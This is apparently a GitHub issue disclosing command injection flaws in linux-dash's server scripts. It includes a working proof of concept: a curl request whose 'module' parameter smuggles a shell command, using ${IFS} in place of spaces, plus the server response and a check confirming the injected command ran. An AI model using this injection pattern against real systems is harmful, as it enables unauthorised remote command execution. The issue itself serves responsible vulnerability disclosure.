injection vulnerabilities
jefimm opened this issue · comments
https://github.com/afaqurk/linux-dash/blob/master/app/server/index.js#L76
and
https://github.com/afaqurk/linux-dash/blob/master/app/server/index.py#L30
are lacking escaping and are vulnerable to command injection
How to exploit the Python server:
python index.py --port 8080
Trigger the command injection:
curl -v 'http://localhost:8080/server/?module=$(touch${IFS}/tmp/uhoh)'
* Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET /server/?module=$(touch$IFS/tmp/uhoh) HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: BaseHTTP/0.3 Python/2.7.18
< Date: Tue, 20 Apr 2021 15:09:56 GMT
< Content-type: text/html
<
{\"success\":false,\"status\":\"Invalid module\"}
Verify:
ls -ltr /tmp/uhoh
-rw-rw-r-- 1 thomas thomas 0 Apr 20 16:09 /tmp/uhoh